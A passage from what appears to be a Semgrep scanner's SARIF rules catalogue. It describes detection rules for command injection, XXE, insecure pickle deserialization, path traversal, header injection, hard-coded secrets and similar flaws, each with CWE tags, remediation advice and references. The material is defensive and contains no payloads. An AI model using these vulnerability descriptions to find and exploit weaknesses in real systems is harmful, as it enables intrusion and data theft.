c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"help":{"markdown":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use)\n - [https://www.php.net/manual/en/intro.ftp.php](https://www.php.net/manual/en/intro.ftp.php)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php)\n","text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"helpUri":"https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use","id":"php.lang.security.ftp-use.ftp-use","name":"php.lang.security.ftp-use.ftp-use","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.ftp-use.ftp-use"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"help":{"markdown":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied)\n - [https://go101.org/article/concurrent-common-mistakes.html](https://go101.org/article/concurrent-common-mistakes.html)\n","text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"helpUri":"https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","id":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","name":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask)\n - [https://docs.python.org/3/library/os.html#os.environ](https://docs.python.org/3/library/os.html#os.environ)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","id":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","name":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled)\n - [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/)\n","text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","id":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","name":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"help":{"markdown":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods)\n - [https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb](https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb)\n","text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","id":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","name":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","id":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","name":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"help":{"markdown":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","id":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","name":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","id":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","name":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"help":{"markdown":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n - [https://eprint.iacr.org/2016/759.pdf](https://eprint.iacr.org/2016/759.pdf)\n - [https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf](https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf)\n - [https://datatracker.ietf.org/doc/html/rfc9106#section-4](https://datatracker.ietf.org/doc/html/rfc9106#section-4)\n","text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"helpUri":"https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","id":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","name":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC777 tokensReceived() reentrancy"},"help":{"markdown":"ERC777 tokensReceived() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy)\n - [https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0](https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0)\n - [https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f](https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f)\n","text":"ERC777 tokensReceived() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy","id":"solidity.security.erc777-reentrancy.erc777-reentrancy","name":"solidity.security.erc777-reentrancy.erc777-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc777-reentrancy.erc777-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"help":{"markdown":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization)\n - [https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution](https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution)\n","text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","id":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","name":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"help":{"markdown":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md)\n - [https://owasp.org/www-community/attacks/HTTP_Response_Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting)\n","text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection","id":"generic.nginx.security.header-injection.header-injection","name":"generic.nginx.security.header-injection.header-injection","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.header-injection.header-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","id":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","name":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-empty-password.node-mssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","id":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","name":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe","id":"java.lang.security.xxe.validator-xxe.validator-xxe","name":"java.lang.security.xxe.validator-xxe.validator-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.validator-xxe.validator-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename","id":"javascript.express.express-fs-filename.express-fs-filename","name":"javascript.express.express-fs-filename.express-fs-filename","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.express-fs-filename.express-fs-filename"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","id":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","name":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"help":{"markdown":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using 